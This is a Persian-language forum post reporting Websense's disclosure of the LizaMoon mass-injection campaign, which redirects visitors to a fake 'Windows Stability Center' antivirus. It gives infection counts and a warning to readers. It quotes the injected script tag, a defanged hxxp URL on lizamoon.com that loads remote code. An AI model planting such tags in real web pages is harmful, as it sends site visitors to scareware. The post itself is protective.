Radars
Member
لابراتوار امنیتی Websense خرابکاری از نوع mass-injection را که آن را LizaMoon می نامد اعلام کرد. URL اینجکت شده lizamoon.com می باشد و به همین LizaMoon نام گرفت.
در این حمله این دستور در صفحه قرار داده می شود:
در این حمله این دستور در صفحه قرار داده می شود:
<script src=hxxp://lizamoon.com/ur.php></script>
بر اساس جستجوی گوگل تا این لحظه که توسط رادار گزارش داده می شود تعداد URL های مورد حمله قرار گرفته به حدود ۱,۶۹۰,۰۰۰ رسیده است.این حمله در تاریخ ۲۹ مارس شناسایی شده است و یکی از وسیع ترین حملات در نوع خود تا کنون می باشد و رشد خود را همچنین دارد ادامه می دهد.
نتایج جستجوی گوگل برای URLهای مورد حمله قرار گرفته
روش مورد استفاده به این صورت است که اسکریپت inject شده کاربر را به یک سایت آنتی ویروس جعلی هدایت می نماید، و از آنها می خواهد یک آنتی ویروس جعلی با نام Windows Stability Center را نصب نمایند. در تاریخ ۲۹ مارس تعداد آدرسهای مورد حمله توسط Websense به تعداد ۲۸۰۰۰ اعلام شد ولی رشد باورنکردنی پیدا کرده است. تعداد زیادی از آدرسهای مربوط به iTunes بودند ولی به دلیل انکد کردن اسکریپت توسط iTunes، سیستم کاربران با این حمله مشکلی نخواهند داشت و حمله خنثی می گردد.
با توجه به رشد و عدم وجود نشانه ای در کاهش سرعت رشد آن، پیشنهاد می شود تا برنامه های آنتی ویروس تحت وب که به شما می گویند کامپیوتر شما دارای باگ می باشد را نصب ننمایید.
صفحه اول سایت جعلی Windows Stability Center
نمونه سایت جعلی Windows Stability Center
